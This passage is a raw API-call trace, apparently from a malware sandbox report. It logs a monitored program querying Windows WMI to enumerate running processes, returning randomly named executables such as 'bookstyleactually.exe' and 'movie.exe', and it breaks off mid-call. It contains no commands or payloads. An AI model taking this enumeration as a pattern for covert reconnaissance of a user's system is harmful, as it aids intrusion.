CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0214.962] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0214.962] WbemDefPath:IUnknown:QueryInterface (in: This=0x56388a0, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0214.962] WbemDefPath:IUnknown:Release (This=0x56388a0) returned 0x2 [0214.962] WbemDefPath:IUnknown:Release (This=0x56388a0) returned 0x1 [0214.962] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0214.962] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0214.962] WbemDefPath:IUnknown:QueryInterface (in: This=0x56388a0, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x56388a0) returned 0x0 [0214.962] WbemDefPath:IUnknown:AddRef (This=0x56388a0) returned 0x3 [0214.962] WbemDefPath:IUnknown:Release (This=0x56388a0) returned 0x2 [0214.962] WbemDefPath:IWbemPath:SetText (This=0x56388a0, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2944\"") returned 0x0 [0214.962] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0214.962] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0214.963] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.963] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0214.963] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0214.963] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.963] IWbemClassObject:Get (in: This=0x5636e00, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x269f568*=0, plFlavor=0x269f56c*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="bookstyleactually.exe", varVal2=0x0), pType=0x269f568*=8, plFlavor=0x269f56c*=0) returned 0x0 [0214.963] SysStringByteLen (bstr="bookstyleactually.exe") returned 0x2a [0214.963] SysStringByteLen (bstr="bookstyleactually.exe") returned 0x2a [0214.963] IWbemClassObject:Get (in: This=0x5636e00, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x269f568*=8, plFlavor=0x269f56c*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="bookstyleactually.exe", varVal2=0x0), pType=0x269f568*=8, plFlavor=0x269f56c*=0) returned 0x0 [0214.963] SysStringByteLen (bstr="bookstyleactually.exe") returned 0x2a [0214.963] SysStringByteLen (bstr="bookstyleactually.exe") returned 0x2a [0214.963] CoTaskMemAlloc (cb=0x4) returned 0x5632528 [0214.963] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x5632528, puReturned=0x267acc0 | out: apObjects=0x5632528*=0x5636f98, puReturned=0x267acc0*=0x1) returned 0x0 [0214.964] IUnknown:QueryInterface (in: This=0x5636f98, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x5636f98) returned 0x0 [0214.964] IUnknown:QueryInterface (in: This=0x5636f98, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0214.964] IUnknown:QueryInterface (in: This=0x5636f98, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0214.964] IUnknown:AddRef (This=0x5636f98) returned 0x3 [0214.964] IUnknown:QueryInterface (in: This=0x5636f98, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0214.964] IUnknown:QueryInterface (in: This=0x5636f98, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0214.964] IUnknown:QueryInterface (in: This=0x5636f98, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x5636f9c) returned 0x0 [0214.965] IMarshal:GetUnmarshalClass (in: This=0x5636f9c, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0214.965] IUnknown:Release (This=0x5636f9c) returned 0x3 [0214.965] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0214.965] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0214.965] IUnknown:QueryInterface (in: This=0x5636f98, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0214.965] IUnknown:Release (This=0x5636f98) returned 0x2 [0214.965] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0214.965] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0214.965] IUnknown:QueryInterface (in: This=0x5636f98, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x5636f98) returned 0x0 [0214.965] IUnknown:AddRef (This=0x5636f98) returned 0x4 [0214.965] IUnknown:Release (This=0x5636f98) returned 0x3 [0214.965] IUnknown:Release (This=0x5636f98) returned 0x2 [0214.965] CoTaskMemFree (pv=0x5632528) [0214.965] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0214.965] IUnknown:AddRef (This=0x5636f98) returned 0x3 [0214.965] IWbemClassObject:Get (in: This=0x5636f98, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0214.966] IWbemClassObject:Get (in: This=0x5636f98, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2928\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0214.966] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2928\"") returned 0x66 [0214.966] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2928\"") returned 0x66 [0214.966] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0214.966] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0214.966] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0214.966] IUnknown:Release (This=0x6d0cac) returned 0x1 [0214.967] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x5632528) returned 0x0 [0214.967] WbemDefPath:IUnknown:QueryInterface (in: This=0x5632528, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0214.967] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5632528, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x5638980) returned 0x0 [0214.967] WbemDefPath:IUnknown:Release (This=0x5632528) returned 0x0 [0214.967] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638980, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x5638980) returned 0x0 [0214.967] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638980, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0214.967] WbemDefPath:IUnknown:AddRef (This=0x5638980) returned 0x3 [0214.967] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638980, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0214.968] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638980, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0214.968] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638980, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x5632538) returned 0x0 [0214.968] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5632538, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.968] WbemDefPath:IUnknown:Release (This=0x5632538) returned 0x3 [0214.968] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0214.968] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0214.968] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638980, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0214.968] WbemDefPath:IUnknown:Release (This=0x5638980) returned 0x2 [0214.968] WbemDefPath:IUnknown:Release (This=0x5638980) returned 0x1 [0214.968] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0214.968] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0214.968] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638980, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x5638980) returned 0x0 [0214.968] WbemDefPath:IUnknown:AddRef (This=0x5638980) returned 0x3 [0214.968] WbemDefPath:IUnknown:Release (This=0x5638980) returned 0x2 [0214.968] WbemDefPath:IWbemPath:SetText (This=0x5638980, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2928\"") returned 0x0 [0214.968] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0214.968] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0214.968] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.968] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0214.968] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0214.968] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.968] IWbemClassObject:Get (in: This=0x5636f98, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x269fdfc*=0, plFlavor=0x269fe00*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="movie.exe", varVal2=0x0), pType=0x269fdfc*=8, plFlavor=0x269fe00*=0) returned 0x0 [0214.969] SysStringByteLen (bstr="movie.exe") returned 0x12 [0214.969] SysStringByteLen (bstr="movie.exe") returned 0x12 [0214.969] IWbemClassObject:Get (in: This=0x5636f98, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x269fdfc*=8, plFlavor=0x269fe00*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="movie.exe", varVal2=0x0), pType=0x269fdfc*=8, plFlavor=0x269fe00*=0) returned 0x0 [0214.969] SysStringByteLen (bstr="movie.exe") returned 0x12 [0214.969] SysStringByteLen (bstr="movie.exe") returned 0x12 [0214.969] CoTaskMemAlloc (cb=0x4) returned 0x5632568 [0214.969] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x5632568, puReturned=0x267acc0 | out: apObjects=0x5632568*=0x5637130, puReturned=0x267acc0*=0x1) returned 0x0 [0214.970] IUnknown:QueryInterface (in: This=0x5637130, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x5637130) returned 0x0 [0214.970] IUnknown:QueryInterface (in: This=0x5637130, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0214.970] IUnknown:QueryInterface (in: This=0x5637130, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0214.970] IUnknown:AddRef (This=0x5637130) returned 0x3 [0214.970] IUnknown:QueryInterface (in: This=0x5637130, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0214.970] IUnknown:QueryInterface (in: This=0x5637130, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0214.970] IUnknown:QueryInterface (in: This=0x5637130, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x5637134) returned 0x0 [0214.970] IMarshal:GetUnmarshalClass (in: This=0x5637134, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0214.970] IUnknown:Release (This=0x5637134) returned 0x3 [0214.970] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0214.970] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0214.970] IUnknown:QueryInterface (in: This=0x5637130, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0214.971] IUnknown:Release (This=0x5637130) returned 0x2 [0214.971] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0214.971] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0214.971] IUnknown:QueryInterface (in: This=0x5637130, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x5637130) returned 0x0 [0214.971] IUnknown:AddRef (This=0x5637130) returned 0x4 [0214.971] IUnknown:Release (This=0x5637130) returned 0x3 [0214.971] IUnknown:Release (This=0x5637130) returned 0x2 [0214.971] CoTaskMemFree (pv=0x5632568) [0214.971] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0214.971] IUnknown:AddRef (This=0x5637130) returned 0x3 [0214.971] IWbemClassObject:Get (in: This=0x5637130, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0214.971] IWbemClassObject:Get (in: This=0x5637130, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3768\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0214.971] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3768\"") returned 0x66 [0214.971] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3768\"") returned 0x66 [0214.972] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0214.972] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0214.972] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0214.972] IUnknown:Release (This=0x6d0cac) returned 0x1 [0214.972] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x5632568) returned 0x0 [0214.973] WbemDefPath:IUnknown:QueryInterface (in: This=0x5632568, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0214.973] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5632568, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x5638a60) returned 0x0 [0214.973] WbemDefPath:IUnknown:Release (This=0x5632568) returned 0x0 [0214.973] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638a60, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x5638a60) returned 0x0 [0214.973] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638a60, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0214.973] WbemDefPath:IUnknown:AddRef (This=0x5638a60) returned 0x3 [0214.973] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638a60, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0214.973] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638a60, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0214.973] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638a60, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, 